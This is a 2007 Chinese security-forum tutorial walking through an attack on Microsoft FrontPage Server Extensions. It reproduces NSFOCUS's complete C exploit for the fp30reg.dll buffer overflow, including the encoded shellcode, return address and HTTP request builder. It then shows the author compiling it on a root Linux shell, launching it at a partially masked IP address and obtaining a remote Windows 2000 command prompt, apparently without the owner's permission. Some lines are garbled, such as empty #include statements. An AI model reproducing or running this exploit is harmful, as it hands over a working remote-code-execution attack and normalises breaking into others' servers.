实例为你解说FrontPageServer溢出攻击
2007-03-08   赛迪网安全社区

Pinging 61.153.xxx.xxxwith 32 bytes of data:

Reply from 61.153.xxx.xx: bytes=32 time=36ms TTL=124 
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124 
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124

telnet 211.100.xxx.xxx(My fat hen,haha) 
Red Hat Linux release 7.0.1J (Guinness)
Kernel 2.2.16-22 on an i686 
login: bytes 
passwd:xxxxxxx
[root@glb-linux-1 bytes]#id 
uid=0 (root) gid=2513(other)

[root@glb-linux-1 bytes]# vi kill.c 


/* 
*  fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug. 
*  Copyright (c) 2001 - Nsfocus.com 
* 
*  DISCLAIMS: 
*  This  is a proof of concept code.  This code is for test purpose 
*  only and should not be run against any host without permission from 
*  the system administrator. 
* 
*  NSFOCUS Security Team 
*  http://www.nsfocus.com 
*/ 
/* # 前面这里是版权信息,以及程序说明*/ 


#include  
#include   
#include   
#include   
#include   
#include   
#include   
#include   

/* fat shellcode */ 
/* # shellcode比较多 */ 
char shellcode[] = 

"\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34" 
"\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46" 
"\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12" 
"\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2" 
"\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
"\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
"\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
"\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d" 
"\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
"\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
"\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
"\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
"\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
"\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
"\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
"\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
"\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
"\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
"\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
"\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f" 
"\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55" 
"\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
"\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d" 
"\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27" 
"\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b" 
"\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
"\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa" 
"\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55" 
"\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
"\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
"\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
"\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
"\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
"\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55" 
"\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa" 
"\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
"\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16" 
"\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
"\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
"\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8" 
"\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23" 
"\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa" 
"\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa" 
"\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55" 
"\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55" 
"\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f" 
"\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f" 
"\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36" 
"\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55" 
"\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55" 
"\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55" 
"\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f" 
"\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55" 
"\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27" 
"\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55" 
"\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e" 
"\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb" 
"\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" 
"\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0" 
"\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55" 
"\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d" 
"\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27" 
"\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29" 
"\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8" 
"\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55" 
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55" 
"\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55" 
"\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6" 
"\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21" 
"\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55" 
"\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa" 
"\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e" 
"\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55" 
"\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d" 
"\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54" 
"\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e" 
"\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a" 
"\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde" 
"\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce" 
"\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf" 
"\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6" 
"\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde" 
"\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa"; 
/* # 结束*/ 

int 
resolv (char *host, long *ip) 
{ 
     struct hostent *hp; 
     if ((*ip = inet_addr (host))<0) 
     { 
       if ((hp = gethostbyname (host)) == NULL) 
       { 
         fprintf (stderr, "%s: unknown host\n", host); 
         exit (-1); 
       } 
      *ip = *(unsigned long *) hp->h_addr; 
    } 
return 0; 
} 

int 
connect_to (char *hostname, short port) 
{ 
struct sockaddr_in sa; 
int s; 
s = socket (AF_INET, SOCK_STREAM, 0); 
resolv (hostname, (long *) &sa.sin_addr.s_addr); 
sa.sin_family = AF_INET; 
sa.sin_port = htons (port); 
if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1) 
   { 
      perror("connect"); 
      exit(-1); 
  } 
return s; 
} 

void 
runshell (int sockd) 
{ 
char buff[1024]; 
int ret; 
fd_set fds; 
printf("\nPress CTRL_C to exit the shell!\n"); 
for (;
   { 
     FD_ZERO (&fds); 
     FD_SET (0, &fds); 
     FD_SET (sockd, &fds); 
     if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0) 
       { 
         exit (-1); 
       } 
     if (FD_ISSET (sockd, &fds)) 
       { 
         bzero (buff, sizeof buff); 
          if ((ret=read(sockd,buff,sizeof(buff)))<1) 
           { 
             fprintf (stderr, "Connection closed\n"); 
             exit (-1); 
           } 
         write(1,buff,ret); 
       } 

     if (FD_ISSET (0, &fds)) 
       { 
         bzero (buff, sizeof buff); 
         ret=read(0,buff,sizeof(buff)); 
         write(sockd,buff,ret); 
       } 
   } 
} 


main (int argc, char **argv) 
{ 
char overbuff[400]; 
char buff[4096]; 
/* If system has the unicode bug, it is possible to attack fp4areg.dll */ 
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */ 
char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll"; 
char server[] = "www.blahblah.com"; 
char retaddress[] = "\x62\x18\xd5\x67"; 
char jmpshell[] = "\xff\x66\x78"; 
int  i, sockfd; 
int port = 80; 
if (argc < 2) 
   { 
     printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security 
Team\n\n"); 
     printf ("Usage: %s victim [port]\n", argv[0]); 
     exit (-1); 
   } 
if (argc > 2) port = atoi (argv[2]); 
sockfd = connect_to (argv[1], port); 
bzero (overbuff, sizeof (overbuff)); 
bzero (buff, sizeof (buff)); 
memset (overbuff, 'a', 258); 
memcpy (overbuff, jmpshell, strlen (jmpshell)); 
strcpy (overbuff + 258, "%c"); 
for (i = 0; i < 0x50; i += 4) 
     strncat (overbuff, retaddress, 4); 
strcat (overbuff, "aaa"); 
sprintf (buff, 
          "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \ 
text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s", 
          fppath, overbuff, server, strlen (shellcode), shellcode); 
printf ("buff len = %d\n", strlen (buff)); 
write (sockfd, buff, strlen (buff)); 
printf ("payload sent!\n"); 
if(read (sockfd, buff, strlen(buff))<0) 
{ 
   printf("EOF\n"); 
   exit(-1); 
} 
else 
{ 
   if(memcmp(buff,"XORDATA",8)==0) 
   { 
    printf("exploit succeed\n"); 
    /* Press Enter key to get the command prompt */ 
    runshell (sockfd); 
   } 
   else 
   { 
    printf("exploit failed\n"); 
    close(sockfd); 
    exit(-1); 
   } 
} 
}

[root@glb-linux-1 bytes]# gcc -o kill kill.c(编译成功) 
[root@glb-linux-1 bytes]#  ./kill(先看一下说明) 
Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team 

Usage: ./iis victim [port] 

[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80 

buff len = 2201 

payload sent! 

exploit failed

[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80(再来~!) 

buff len = 2201 

payload sent! 

exploit succeed 

Press CTRL_C to exit the shell!(这就是我们想得到的一个shell) 

dir c:\ 

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd c:\ 
c:\dir 
……